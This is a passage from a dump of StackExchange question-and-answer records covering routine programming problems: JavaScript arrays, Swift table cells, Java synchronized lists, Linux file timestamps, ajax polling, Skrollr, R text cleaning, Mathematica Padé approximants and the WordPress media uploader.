getting these errors:\nWhen passed an array of multiple elements, function will return an array of alternating items\n\u2715 AssertionError: expected 'a' to deeply equal [ 'a', 'c', 'e' ]\nWhen passed an array of multiple elements, function will return an array of alternating items\n\u2715 AssertionError: expected 100 to deeply equal [ 100, 99, -5 ]\nCan someone help please?\n<code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n for (let i=0; i<array.length; i=+2){\n return array[i]\n }\n \n}\n<\/code>\nComment: `return` exits the function.... So on your for loop it exits. So for a for loop you need to `push` into a new array. Buy you really should just use `filter`\nAnswer: <code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n return array.filter((el, i) => i % 2 === 0);\n}\n<\/code>\nhttps:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Global_Objects\/Array\/filter\nor\n<code>function makeAlternatingArray(array) {\n if (array.length<=1){\n return array\n }\n let newArray = [];\n for (let i=0; i<array.length; i=+2){\n newArray.push(array[i]);\n }\n return newArray;\n}\n<\/code>\nComment: Thank you for that, can you explain to me \"el\"and \"i\" here? As I didn't learn about this yet want to know what does it stand for so I can use it in future.\nComment: If you look at the link, you'll see that the callback function's first two parameters are `element` and `index`, which I've called `el` and `i`. I didn't need the third parameter, so I didn't declare it.\n","meta":{"source":"stackoverflow","title":"To Make alternating array","dup_signals":{}},"subset":"stackexchange"} +{"text":"PNChart-swift not working\n\nQuestion: I wanna use some charts in my swift project, actually I was using PNChart before, but now I need to move on to PNChart-swift.\nhttps:\/\/github.com\/kevinzhow\/PNChart-Swift\nas the readme saids I added some lines in Podfile, and I \n<code>pod install<\/code>\nthen I get \"no such module PNChart-swift\"\nI think Pod is cloning the wrong Codes from the PNChart-swift repository.\nIs there any way I can clone the codes and use as the library without using Pod?\nThank you.\nAnswer: For manual installation you could just download the repo as zipfile and than drag the .xcodeproj file into your project.\nThis will create the required reference so that you can use it.\nYou may also need to add it as embedded framework in your project settings.\nComment: drag the frameworks .xcodeproj file into your project (you may want to create a group \"frameworks\" or something like that and drop it into this group to keep your project's structure clean :) Also if you drag-and-dropped it into your project you still may need to \"import\" it in the classes where you want to use it.\nComment: You mean I should drag the .xcodeproj directly to xcode, which is opened by project.xcworkspace?\n","meta":{"source":"stackoverflow","title":"PNChart-swift not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"Swift 3 incorrect initial UITableViewCell row height\n\nQuestion: I am trying to programmatically design the layout of my custom UITableView cells. However, I get some strange behavior: despite setting the rowHeight, the first four rows are the default height, and then the rest are what I specified. This impacts the design of my cell, because I programmatically lay out labels based in part on the row height.\nI initialize the tableview as follows:\n<code>func gameTableInit() {\n gameTableView = UITableView()\n gameTableView.delegate = self\n gameTableView.dataSource = self\n \n let navFrame = self.navigationController?.view.frame\n gameTableView.frame = CGRect(x: navFrame!.minX, y: navFrame!.maxY, width: self.view.frame.width, height: self.view.frame.height - navFrame!.height - (self.tabBarController?.view.frame.height)!)\n gameTableView.rowHeight = gameTableView.frame.height\/4 \/\/HEIGHT OF TABLEVIEW CELL\n gameTableView.register(GameCell.self, forCellReuseIdentifier: \"cell\")\n \n self.view.addSubview(gameTableView)\n\n}\n<\/code>\nThis is my cellForRowAtIndexPath function:\n<code>func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {\n let cell = tableView.dequeueReusableCell(withIdentifier: \"cell\") as! GameCell\n print(\"height of cell: \\(cell.frame.height)\")\n var game = Game()\n game.awayTeam = \"CLE\"\n game.homeTeam = \"GSW\"\n cell.setUIFromGame(g: game)\n return cell\n}\n<\/code>\nThe print statement prints:\n\nheight of cell: 44.0\nheight of cell: 44.0\nheight of cell: 44.0\nheight of cell: 44.0\n\nAfter some scrolling, it then prints the expected:\n\nheight of cell: 166.75\n...\n\nI have created a custom tableview cell called GameCell\n<code>class GameCell: UITableViewCell {\n\n override func awakeFromNib() {\n super.awakeFromNib()\n \/\/ Initialization code\n \n }\n\n override func setSelected(_ selected: Bool, animated: Bool) {\n super.setSelected(selected, animated: animated)\n \n \/\/ Configure the view for the selected state\n }\n\n override func layoutSubviews() {\n super.layoutSubviews()\n positionUIElements()\n }\n\n override init(style: UITableViewCellStyle, reuseIdentifier: String?) {\n super.init(style: style, reuseIdentifier: reuseIdentifier)\n }\n\n required init?(coder aDecoder: NSCoder) {\n fatalError(\"init(coder:) has not been implemented\")\n }\n\n \/\/on left\n var awayTeamAbbrev = UILabel()\n var awayTeamLogo: UIImage!\n\n \/\/on right\n var homeTeamAbbrev = UILabel()\n var homeTeamLogo: UIImage!\n\n func positionUIElements() {\n \/\/away team abbreviation is centered on upper left half of cell\n awayTeamAbbrev.frame = CGRect(x: self.frame.minX, y: self.frame.minY, width: self.frame.midX, height: self.frame.height\/4)\n awayTeamAbbrev.textAlignment = .center\n awayTeamAbbrev.adjustsFontSizeToFitWidth = true\n \/\/awayTeamLogo\n \n \/\/home team abbreviation is centered on upper right half of cell\n homeTeamAbbrev.frame = CGRect(x: self.frame.midX, y: self.frame.minY, width: self.frame.midX, height: self.frame.height\/4)\n homeTeamAbbrev.textAlignment = .center\n homeTeamAbbrev.adjustsFontSizeToFitWidth = true\n \n \/\/homeTeamLogo\n \n self.contentView.addSubview(awayTeamAbbrev)\n self.contentView.addSubview(homeTeamAbbrev)\n }\n\n func setUIFromGame(g: Game) {\n awayTeamAbbrev.text = g.awayTeam!\n homeTeamAbbrev.text = g.homeTeam!\n }\n\n}\n<\/code>\nI have tried many of the suggested answers online like calling layoutIfNeeded, but that didn't work anywhere I tried it.\nAnswer: While accepted answer can help in some cases I would like to share some other ways to fix this issue:\n\nCheck Content Hugging Priority of your cell's components (especially if you're using stack views inside cell)\nIn your cell add:\n<code>override func didMoveToSuperview() {\nsuper.didMoveToSuperview()\nlayoutIfNeeded() \n<\/code>\nAnswer: I found a working solution: In my GameCell class, I overrided layout subviews:\n<code>override func layoutSubviews() {\n super.layoutSubviews()\n self.contentView.layoutIfNeeded()\n positionUIElements()\n self.awayTeamAbbrev.preferredMaxLayoutWidth = self.awayTeamAbbrev.frame.size.width\n self.homeTeamAbbrev.preferredMaxLayoutWidth = self.homeTeamAbbrev.frame.size.width\n}\n<\/code>\nAnswer: 44 is defailt height for UITableViewCell in UITableView, try to override func \n<code>func tableView(tableView: UITableView, heightForRowAtIndexPath indexPath: NSIndexPath) -> CGFloat {\n return UITableViewAutomaticDimension;\n}\n<\/code>\nor return exact value, in your case 166.75\nComment: I want the height of the cell to vary based on the height of the device, so I tried setting the rowHeight member when initializing. However, every row should have the same height, which is why I avoided that function for performance reasons\nComment: Hmmm, I tried this method out of curiosity, and it still didn't work. Strange\nComment: Is that method called? There is option in inicialization of tableview - estimatedRowHeight\nComment: Yep, just verified heightForRow was called. But the behavior is still the same. Perhaps it is an Apple bug? This is my first time creating the tableviewcells completely in swift (usually I use IB), and my first time with this problem\nAnswer: I had the same problem using <code>UITableViewDiffableDataSource<\/code>. The <code>tableView<\/code> set the correct <code>cell<\/code> height after I attempt to scroll manually the content.\nThe <code>tableView<\/code> was inside on an <code>UIViewController<\/code>. The <code>dataSource<\/code> was applied on the <code>viewDidLoad<\/code> method.\nI reloaded the <code>tableView<\/code> content using <code>tableView.reloadData()<\/code> inside the <code>viewWillAppear<\/code> and the problem was solve.\n","meta":{"source":"stackoverflow","title":"Swift 3 incorrect initial UITableViewCell row height","dup_signals":{}},"subset":"stackexchange"} +{"text":"java - general synchronizedList question\n\nQuestion: I have a general question regarding synchronized List.\nLets say that in the constructor I am createing a list \n<code>List synchronizedList = Collections.synchronizedList(list);\n<\/code>\nand I have one method adds an object to the list. \n<code>public void add(String s){ \n synchronizedList.add(s)\n}\n<\/code>\nThere is another thread that checks every few seconds if there are a few rows , dump it to a file and deletes them all. \nNow lets say I iterate each row and save it to the db. \nafter all iteration I clear the list. \nHow does the multithread support help me?\nI could add an element to the list just before the clear() in the other thread occurs .\nUnless I manage the lock myself (which I dont realy need a synched list for that ) it myself.\nComment: As all the three answers state, synchronized list means that all the operations on that list are guaranteed to be atomic or guarantee serial access to individual method calls. I had to ask my colleague what is that mean. So it means operations on List like(from above code snippet) `synchronizedList.size()` and `synchronizedList.add(s)` cannot be in parallel. This is not obvious for some people who is reading this thread. So though of adding to help other who dont understand. Thanks @WhiteFang34, @jb-nizet and @khachik for explanations below.\nAnswer: The synchronized list returned by <code>Collections<\/code> won't help in your case. It's only good if you need to guarantee serial access to individual method calls. If you need to synchronize around a larger set of operations, then you need to manually wrap that code in a <code>synchronized<\/code> block. The Javadoc states:\n\nIt is imperative that the user manually synchronize on the returned list when iterating over it.\n\nIf your list is used elsewhere you can at least safeguard it from individual method calls that would otherwise not be thread-safe. If you're entirely managing the list however, you can just add a <code>synchronized<\/code> block to your <code>add<\/code> method and use the same lock that you'll use when iterating over it.\nAnswer: <code>synchronizedList<\/code> indeed only guarantees that every method call on the list is synchronized. If you need multiple operations to be done in a synchronized way, you have to handle the synchronization yourself.\nBTW, this is explicitely said in the javadoc for Collections.synchronizedList : \n\nIt is imperative that the user\n manually synchronize on the returned\n list when iterating over it:\n\n<code> List list = Collections.synchronizedList(new ArrayList());\n ...\n synchronized(list) {\n Iterator i = list.iterator(); \/\/ Must be in synchronized block\n while (i.hasNext())\n foo(i.next());\n }\n<\/code>\nAnswer: synchronized list means that all the operations on that list are guaranteed to be atomic. The scenario you describe requires to have some locking outside the list. Consider semaphores or making <code>synchronized<\/code> block to implement monitors. Take a look at java.util.concurrent.\n","meta":{"source":"stackoverflow","title":"java - general synchronizedList question","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pade' approximation\n\nQuestion: Do you know how to enter this equation in Mathematica? It is Pade approximation, Values of p(2,..,7) are also given.\nIs it just simply writing this in Mathematica? or should I do something else?\nComment: Please include Mathematica code that you have tried so far.\nComment: @Syed I haven't. there is `PadeApproximant` in mathematica. but I don't know how to fit this formula to that.\nComment: Do you want to find an approximation to $\\theta$ at the point $T_{\\text{eff}}$ = ?\nComment: @Syed I suppose so\nAnswer: The function posted can be expressed exactly as an order [4\/3] Pad\u00e9 approximant about <code>Teff=0<\/code>.\nSometimes when defining a function with a lot of numeric parameters, it is easier to put in symbolic values <code>{p[2],p[3],...,p[7]}<\/code> first to confirm the function is defined correctly:\n<code>pSymbols = Array[p, 6, 2];\n<\/code>\nYour function sort of looks like $$\\frac{k T_{eff}}{1- k T_{eff}\\left(\\frac{\\mathrm{even \\: P \\: stuff}}{\\mathrm{odd \\:P \\:stuff}}\\right)}$$ Notice there's a pattern in the even and odd $P$ parts in the denominator of your function (there's probably a neater way to write this with <code>Nest<\/code> or <code>Fold<\/code>, I just haven't been able to figure it out yet). In this case, it probably would be easier just to write out the denominator by hand, but this makes sense to do here since there is a clear pattern:\n<code>evenPStuff = pSymbols[[-2]];\nDo[\n evenPStuff *= k*Teff;\n evenPStuff += i;\n , \n{i, pSymbols[[1 ;; -3 ;; 2]] \/\/ Reverse}\n ]\n\noddPStuff = pSymbols[[-1]];\nDo[\n oddPStuff *= k*Teff;\n oddPStuff += i;\n, \n{i, pSymbols[[2 ;; -3 ;; 2]] \/\/ Reverse}\n ]\noddPStuff *= k*Teff;\noddPStuff += 1;\n<\/code>\nwe can now neatly define $\\theta$ (with symbolic values for the parameters $P_n$) as a function of $T_{eff}$ (pasting the output with the symbols as a screenshot so it's easier to look at):\n<code>\\[Theta]Symbolic[Teff_] = (k*Teff)\/(1 - k*Teff*(evenPStuff\/oddPStuff))\n<\/code>\n\nNow let's take the order [4,3] Pad\u00e9 approximant about <code>Teff=0<\/code> of <code>\\[Theta]Symbolic[Teff]<\/code>:\n<code>pade43 = PadeApproximant[\\[Theta]Symbolic[Teff], {Teff, 0, {4, 3}}];\npade43 \/\/ Numerator \/\/ Expand\npade43 \/\/ Denominator \/\/ Expand\n<\/code>\n\n<code>k Teff + k^2 Teff^2 p[3] + k^3 Teff^3 p[5] + k^4 Teff^4 p[7]<\/code>\n\n<code>1 - k Teff p[2] + k Teff p[3] - k^2 Teff^2 p[4] + k^2 Teff^2 p[5] - k^3 Teff^3 p[6] + k^3 Teff^3 p[7]<\/code>\n\nAnd we see this is indeed the same as <code>\\[Theta]Symbolic[Teff]<\/code>:\n<code>pade43 == \\[Theta]Symbolic[Teff] \/\/Simplify\n<\/code>\n\n<code>True<\/code>\n\nWe can also now plug in our numerical parameter values. We can plug them into <code>pade43<\/code> since we know it's the same as <code>\\[Theta]Symbolic[Teff]<\/code> but has a nicer looking form:\n<code>pVals = {-5.9357*10^-2, 2.0165*10^-1, 1.0404*10^-3, \n 2.7621*10^-3, -9.1653*10^-6, 9.8305*10^-7};\n\\[Theta][Teff_] = pade43 \/. AssociationThread[pSymbols -> pVals]\n<\/code>\n\n<code>(k Teff + 0.20165 k^2 Teff^2 + 0.0027621 k^3 Teff^3 + 9.8305*10^-7 k^4 Teff^4)\/(1 + 0.261007 k Teff + 0.0017217 k^2 Teff^2 + 0.0000101484 k^3 Teff^3)<\/code>\nComment: Thank you very much for your invaluable response. \nso if i just enter the last line: `(k Teff + 0.20165 k^2 Teff^2 + 0.0027621 k^3 Teff^3 + 9.8305*10^-7 k^4 Teff^4)\/(1 + 0.261007 k Teff + 0.0017217 k^2 Teff^2 + 0.0000101484 k^3 Teff^3)`\nin my code, that would be enough?\nComment: @lia Yes (if all that you need to do is enter a definition for `\\[Theta][Teff]` )\nComment: ok Thanks a lot for your time\n","meta":{"source":"mathematica.stackexchange","title":"Pade' approximation","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to store file creation time in linux\n\nQuestion: Is there any way to store file creation time in linux? May be filesystem that supports that. I mean CREATION TIME not mtime or ctime.\nComment: What is the difference between \"CREATION TIME\" and ctime?\nComment: @Paul: ctime is the metadata change time.\nComment: @Paul: http:\/\/www.kavoir.com\/2009\/04\/linux-the-differences-between-file-times-atime-accessed-time-ctime-changed-time-and-mtime-modified-time.html\nComment: Well, 99.9% of the files on my systems have never have a chmod or chown since they were created, so ctime is fine for those cases.\nComment: @Paul: ctime includes content modification. It just *also* includes chmod\/chown, while mtime does not.\nComment: Ok, I guess it's lucky I've never cared about ctime because I never knew it included content modification.\nAnswer: Most (all?) Linux filesystems do not store the time when the file was created. Instead, they just store when the file was last modified, when it was last accessed, and when it last had an administrative action applied to it (e.g., changing its permissions). Of those, the best approximation to what you're looking for is usually the modification time.\nComment: @t0ster: HFS and HFS+ support creation time. ext2\/3\/4 does not.\nComment: On OS X there is way to get creation time of the file as well as ctime and mtime. I thought may be on linux too.\nComment: Accroding to this resource http:\/\/www.qa.com\/about-qa\/blogs\/2010\/july\/creation-time-in-unix-yes---in-ext4 ext4 has such parameter as `crtime`, but it is not easy to work with (yet).\nComment: It seems the link in the last comment was wrong (or got obsoleted). The working link is http:\/\/www.qa.com\/about-qa\/blogs\/2010\/july\/creation-time-in-unix-yes-in-ext4\/.\nAnswer: I do believe that Ext4 has creation time support.\nTry this debugfs: \n<code>debugfs -R 'stat <inode>' \/dev\/block_dev.\n\nFragment: Address: 0 Number: 0 Size: 0\nctime: 0x51872d50:df6167a0 -- Mon May 6 07:10:56 2013\natime: 0x5183b4e1:d2ad63cc -- Fri May 3 16:00:17 2013\nmtime: 0x51872d50:df6167a0 -- Mon May 6 07:10:56 2013\ncrtime: 0x5183b4e1:d2ad63cc -- Fri May 3 16:00:17 2013\n<\/code>\nUnderstanding EXT4 (Part 2): Timestamps\nAnswer: On NTFS using ntfs-3g you can access the creation time via an extended attribute (see <code>attr(5)<\/code>).\nComment: It's an option, but don't want to have deal with NTFS on linux.\nComment: Well, your other option is HFS, and you *really* don't want to deal with HFS on Linux.\nAnswer: If you want to store file creation times, you can use filesystem event notification tool like inotify.\nIt has system calls that make you aware of IN_CREATE (a file creation event) or some other event, When a file creation event happens you can simply log that with current time in a file of your preference.\nComment: It's also an option, I'll take a look.\n","meta":{"source":"stackoverflow","title":"How to store file creation time in linux","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to do ajax request and html element update in background?\n\nQuestion: I have html form with three elements - buttons start and stop and text area. Once start button is pressed, I would like to do multiple ajax requests and once result is received to update the text area, once stop is pressed, processing of ajax requests should be stopped.\nI tried to do something like below:\n<code>$(document).ready(function(){\n var inProgress = false;\n\n $(\"#stop\").click(function() {\n inProgress = false;\n });\n\n $(\"#start\").click(function() {\n inProgress = true;\n while (inProgress) {\n $('#textarea').html($('#textarea').val()+sometext+'\\n');\n $.ajax({url: 'http:\/\/example.com'})\n .done(function(data, textStatus, jqXHR) {\n $('#textarea').html($('#textarea').val()+someresult+'\\n');\n });\n }\n });\n<\/code>\nBut it doesn't work as expected - browser tab hangs. What is wrong with my code?\nComment: `while (inProgress)` never stops. You need to `poll` for the `inProgress` change!\nComment: your browser is stuck in never ending loop\nComment: what is your actual requirement?\nAnswer: Don't use while loop. You should do it in an asynchoronous way: At the end of .done function, put another asynchronous ajax call.\n<code>\/\/ other stuff goes here\n\nfunction doRequest() {\n $.ajax({url: 'http:\/\/example.com'})\n .done(function(data, textStatus, jqXHR) {\n $('#textarea').html($('#textarea').val()+someresult+'\\n');\n\n if (inProgress) doRequest();\n });\n}\n\n$(\"#start\").click(function() {\n inProgress = true;\n $('#textarea').html($('#textarea').val()+sometext+'\\n');\n doRequest();\n});\n<\/code>\nAnswer: Well, since $.ajax is asynchronous by default, you are making a loooot of XHR (ajax calls) ! ;-)\nTry this :\n<code>$(document).ready(function(){\n var inProgress = false;\n\n $(\"#stop\").click(function() {\n inProgress = false;\n });\n\n $(\"#start\").click(function() {\n inProgress = true;\n refresh();\n });\n\n function refresh() { \n $('#textarea').html($('#textarea').val()+sometext+'\\n');\n $.ajax({url: 'http:\/\/example.com'})\n .done(function(data, textStatus, jqXHR) {\n $('#textarea').html($('#textarea').val()+someresult+'\\n');\n if (inProgress) refresh();\n });\n }\n});\n<\/code>\nAnswer: Probably because the browser is busy doing requests and it cannot listen other events. Try to put the code in a function and then use the \n<code>setTimeout( function_reference, timeoutMillis );\n<\/code>\nwith a reasonable timeout.\nSee this code as an example:\n<code>function startTime() {\n var today = new Date();\n var h = today.getHours();\n var m = today.getMinutes();\n var s = today.getSeconds();\n \/\/ add a zero in front of numbers<10\n m = checkTime(m);\n s = checkTime(s);\n document.getElementById(\"txt\").innerHTML = h+ \":\" + m + \":\" + s;\n t = setTimeout(function(){startTime()}, 500);\n}\n\nfunction checkTime(i) {\n if (i<10) {\n i = \"0\" + i;\n }\n return i;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to do ajax request and html element update in background?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Skrollr: manipulate html5 data attributes\n\nQuestion: I've written a Javascript\/jQuery function for dynamically writing HTML5 data attributes into some HTML tags and making Skrollr plugin work. I am unable to use jQuery .data() because it only stores (it does not write inside the tags) attributes. Here is my code:\n<code>parallaxData();\nwindow.addEventListener('resize', parallaxData);\n\nfunction parallaxData(){\n\n if ($(window).width() > 768 && imgContainer.length) { \n\n var imgContainerJS = document.getElementById('big-image'),\n captionJS = document.getElementById('caption'),\n headerJS = document.getElementById('header'); \n\n imgContainerJS.dataset.top = 'transform:translateY(0px);'\n imgContainerJS.dataset.topBottom = 'transform:translateY(' + '-' + imgHeight\/4 + 'px);' \n captionJS.dataset.anchorTarget = \"#big-image-wrap\"\n captionJS.dataset.top = 'transform:translateY(0px);' \n captionJS.dataset.topBottom = 'transform:translateY(' + '-' + imgHeight\/8 + 'px);'\n headerJS.dataset.anchorTarget = \"#big-image-wrap\"\n headerJS.dataset.top = 'transform:translateY(0px);' \n headerJS.dataset.topBottom = 'transform:translateY(' + '-' + imgHeight\/4 + 'px);' \n\n var animDone = false;\n skrollr.init({\n forceHeight: false,\n smoothScrolling: false, \n render: function() {\n if ( header.hasClass('skrollable-after') ) {\n if ( ! animDone ) {\n animDone = true;\n header.addClass('fixed-header').css({\n 'display' : 'none'\n }).fadeIn(300); \n }\n } else {\n animDone = false;\n header.removeClass('fixed-header');\n }\n } \n }).refresh();\n\n imgCaption.css({ position: 'fixed' });\n singleImg.css({ position: 'fixed' });\n\n } else if ($(window).width() > 768) {\n\n $('#content').css({ marginTop: headerHeight + 'px' });\n imgCaption.css({ position: 'fixed' });\n singleImg.css({ position: 'fixed' });\n\n } else {\n\n skrollr.init().destroy();\n $('#content').css({ marginTop: 0 + 'px' });\n\n var parallaxEls = $('header, #big-image, #caption'),\n attrs = parallaxEls[0].attributes,\n name,\n index;\n for (index = attrs.length - 1; index >= 0; --index) {\n name = attrs[index].nodeName;\n if (name.substring(0, 5) === \"data-\") {\n parallaxEls.removeAttr(name);\n }\n } \n\n parallaxEls.css({\n '-webkit-transform' : '',\n '-moz-transform' : '',\n 'transform' : '',\n 'backgroundPosition' : ''\n }).removeClass('skrollable-after');\n\n imgCaption.css({ position: 'absolute' });\n singleImg.css({ position: 'absolute' });\n\n }\n\n}\n<\/code>\nI am wondering if there's a chance to achieving the same result only using jQuery, also because I need to select elements by class and not by ID.\nAnswer: I tried it with jQuery. It is possible to add attributes to img or div or whatever.\nhttp:\/\/api.jquery.com\/attr\/#attr-attributeName-value \n<code>$(document).ready(function(){\n $(\".yourclass\").attr({\n \"data-450\": \"exampleCSS:examplechange;\",\n \"data-500\": \"exampleCSS:examplechange;\"});\n});\n<\/code>\nI tried it with one of my div's from my code and the element is not visible, but the attributes are added, I can see it in firebug\n\nThe other divs are still scrolling so I messed it up somewhere else. \n\nHope it helped you (even when you asked months ago). If you already found an answer, please share your solution\nComment: Yes, in the end I've used .attr\n\nThanks anyway!\n","meta":{"source":"stackoverflow","title":"Skrollr: manipulate html5 data attributes","dup_signals":{}},"subset":"stackexchange"} +{"text":"I can't remove \u2022 and some other special characters such as '- using tm_map\n\nQuestion: I search through the questions and able to replace \u2022 in my first set of command.\nBut when I apply to my corpus, it doesn't work, the \u2022 still appear.\nThe corpus has 6570 elements,2.3mb, so it seems to be valid.\n<code>> x <- \". R Tutorial\"\n> gsub(\"\u2022\",\"\",x)\n[1] \". R Tutorial\"\n\n> removeSpecialChars <- function(x) gsub(\"\u2022\",\"\",x)\n> corpus2=tm_map(corpus2, removeSpecialChars)\n> print(corpus2[[6299]][1])\n[1] \"\u2022 R tutorial \u2022 success\u2013 october\"\n> ##remove special characters\n<\/code>\nComment: Your first call to `gsub()` didn't illustrate the point, because `\u2022` was missing from `x`. But that aside, I tested it and it worked. I don't know what your actual problem is.\nComment: My problem is when it's simply the first call, the gsub function work. But when I apply it in my code in the second call with tm_map and corpus, it can't remove the \u2022\nComment: Probably another encoding issue.\nAnswer: How about this for an alternative that works in a more straightforward way with corpus objects?\n<code>require(quanteda)\nrequire(magrittr)\n\ncorpus3 <- corpus(c(\"\u2022 R Tutorial\", \"More of these \u2022 characters \u2022\", \"Tricky \u2022!\"))\n\n# remove the character from the tokenized corpus\ntokens(corpus3)\n## tokens from 3 documents.\n## text1 :\n## [1] \"R\" \"Tutorial\"\n## \n## text2 :\n## [1] \"More\" \"of\" \"these\" \"characters\"\n## \n## text3 :\n## [1] \"Tricky\" \"!\" \ntokens(corpus3) %>% tokens_remove(\"\u2022\")\n## tokens from 3 documents.\n## [1] \"R\" \"Tutorial\"\n## text1 :\n## \n## text2 :\n## [1] \"More\" \"of\" \"these\" \"characters\"\n## \n## text3 :\n## [1]] \"Tricky\" \"!\" \n\n# remove the character from the corpus itself\ntexts(corpus3) <- gsub(\"\u2022\", \"\", texts(corpus3), fixed = TRUE)\ntexts(corpus3)\n## text1 text2 text3 \n## \" R Tutorial\" \"More of these characters \" \"Tricky !\" \n<\/code>\n","meta":{"source":"stackoverflow","title":"I can't remove \u2022 and some other special characters such as '- using tm_map","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to add the media uploader in wordpress plugin\n\nQuestion: I read out some of the tutorial for how to integrate the media uploader in wordpress plugins. I do the media uploader based on the tutorial. \nhttp:\/\/wordpress.org\/support\/topic\/howto-integrate-the-media-library-into-a-plugin?replies=4\n I do this and it perfectly working. When i tried the same script again for multiple times of media uploader, Here is the fiddle i tried simply changed the id of the particular text field.\nhttp:\/\/jsfiddle.net\/UrXPe\/1\/ \nStill when i click the upload all is to be to done perfect. only thing if i click <code>insert into post<\/code> it url of the image appear in the second browse field. Here is the screenshot what i face exactly.\n\nWhen i click the first upload field (uploading process are success) after insert into post that corresponding media url is appear in the second field not in first. I am not sure where is the problem any suggestion would be great.\nAnswer: UPDATED - scroll down\nAfter too much of hard work and research and some customization I coded below compact few lines of code to use media uploader anywhere in wordpress. Just put code in some function and call that function wherever you want.\nThe path of uploaded\/selected file will be copied to text-box and then you can use it.\n<code>\/\/ jQuery\nwp_enqueue_script('jquery');\n\/\/ This will enqueue the Media Uploader script\nwp_enqueue_media();\n?>\n <div>\n <label for=\"image_url\">Image<\/label>\n <input type=\"text\" name=\"image_url\" id=\"image_url\" class=\"regular-text\">\n <input type=\"button\" name=\"upload-btn\" id=\"upload-btn\" class=\"button-secondary\" value=\"Upload Image\">\n \n<\/div>\n<script type=\"text\/javascript\">\njQuery(document).ready(function($){\n $('#upload-btn').click(function(e) {\n e.preventDefault();\n var image = wp.media({ \n title: 'Upload Image',\n \/\/ mutiple: true if you want to upload multiple files at once\n multiple: false\n }).open()\n .on('select', function(e){\n \/\/ This will return the selected image from the Media Uploader, the result is an object\n var uploaded_image = image.state().get('selection').first();\n \/\/ We convert uploaded_image to a JSON object to make accessing it easier\n \/\/ Output to the console uploaded_image\n console.log(uploaded_image);\n var image_url = uploaded_image.toJSON().url;\n \/\/ Let's assign the url value to the input field\n $('#image_url').val(image_url);\n });\n });\n});\n<\/script>\n<\/code>\nUPDATE: Just to add. You may need to add the function wrapper in your plugin\/theme file. This is the following:\n<code>\/\/ UPLOAD ENGINE\nfunction load_wp_media_files() {\n wp_enqueue_media();\n}\nadd_action( 'admin_enqueue_scripts', 'load_wp_media_files' );\n<\/code>\nThis will call the relevant JS files and CSS files if WP fails to load the upload manager. This also removes console warnings.\nComment: Thank you for this answer. I tried it on a popup but it didn't work: http:\/\/stackoverflow.com\/questions\/30500327\/launching-media-uploader-in-wordpress-from-another-popup .\nComment: Hello can u tell me how can I store this image path to database of word press and retrieve this image later on\nComment: thanks user3337553! @rupesh store it as a custom option, have a look here http:\/\/tinyurl.com\/pz3v9jx\nComment: Any way to force this to default to the upload view instead of whatever view was used last? Awesome code btw. Thank you.\nComment: This works like a charm for one image, but how do you do multiples? I enables the multiple: true, which seems to allow multiple selected, but how can I make those image URIs show up in other text boxes?\nComment: Removing .first() from image.state().get('selection'), convert to JSON and then loop through uploaded_image variable should do the trick. @Articulous\nAnswer: I'm using this method to use media uploader into my custom plugin.May be this would be help.\nin the main theme file(index.php) add these.\n<code>wp_enqueue_style('thickbox'); \/\/ call to media files in wp\nwp_enqueue_script('thickbox');\nwp_enqueue_script( 'media-upload'); \n\n\/\/ load script to admin\nfunction wpss_admin_js() {\n $siteurl = get_option('siteurl');\n $url = $siteurl . '\/wp-content\/plugins\/' . basename(dirname(__FILE__)) . '\/js\/admin_script.js';\n echo \"<script type='text\/javascript' src='$url'><\/script>\"; \n}\n add_action('admin_head', 'wpss_admin_js');\n<\/code>\n\nIn the admin_script.js file,\n<code>jQuery('#wpss_upload_image_button').click(function() {\n formfield = jQuery('#wpss_upload_image').attr('name');\n tb_show('', 'media-upload.php?type=image&TB_iframe=true');\n return false;\n});\n\nwindow.send_to_editor = function(html) {\n imgurl = jQuery('img',html).attr('src');\n jQuery('#wpss_upload_image').val(imgurl);\n tb_remove();\n\n jQuery('#wpss_upload_image_thumb').html(\"<img height='65' src='\"+imgurl+\"'\/>\");\n}\n<\/code>\nadmin file(admin_settings.php),\n<code><div id=\"wpss_upload_image_thumb\" class=\"wpss-file\">\n <?php if(isset($record->security_image) && $record->security_image !='') { ?>\n <img src=\"<?php echo $record->security_image;?>\" width=\"65\"\/><?php } else { echo $defaultImage; } ?>\n<\/div>\n<input id=\"wpss_upload_image\" type=\"text\" size=\"36\" name=\"wpss_upload_image\" value=\"\" class=\"wpss_text wpss-file\" \/>\n<input id=\"wpss_upload_image_button\" type=\"button\" value=\"Upload Image\" class=\"wpss-filebtn\" \/>\n<\/code>\nMore details in my blog\nComment: You can follow this instructions.http:\/\/stackoverflow.com\/questions\/17320802\/how-can-i-use-multi-media-uploader-in-the-wordpress-plugins\nComment: How do you use this for multiple uploading?\nComment: Any idea on how I can remedy my situation inside a popup, @SumithHarshan? http:\/\/stackoverflow.com\/questions\/30500327\/launching-media-uploader-in-wordpress-from-another-popup\nComment: thickbox is deprecated and should not be used.\nAnswer: Use this in your custom plugin \n<code><label for=\"upload_image\">\n <input id=\"upload_image\" type=\"text\" size=\"36\" name=\"ad_image\" value=\"http:\/\/\" \/> \n <input id=\"upload_image_button\" class=\"button\" type=\"button\" value=\"Upload Image\" \/>\n <br \/>Enter a URL or upload an image\n<\/label>\n\n<?php\nadd_action('admin_enqueue_scripts', 'my_admin_scripts');\n\nfunction my_admin_scripts() {\n if (isset($_GET['page']) && $_GET['page'] == 'my_plugin_page') {\n wp_enqueue_media();\n wp_register_script('my-admin-js', WP_PLUGIN_URL.'\/my-plugin\/my-admin.js', array('jquery'));\n wp_enqueue_script('my-admin-js');\n }\n}\n\n?>\n\n<script>\n jQuery(document).ready(function($){\n\n var custom_uploader;\n\n $('#upload_image_button').click(function(e) {\n\n e.preventDefault();\n\n \/\/If the uploader object has already been created, reopen the dialog\n if (custom_uploader) {\n custom_uploader.open();\n return;\n }\n\n \/\/Extend the wp.media object\n custom_uploader = wp.media.frames.file_frame = wp.media({\n title: 'Choose Image',\n button: {\n text: 'Choose Image'\n },\n multiple: true\n });\n\n \/\/When a file is selected, grab the URL and set it as the text field's value\n custom_uploader.on('select', function() 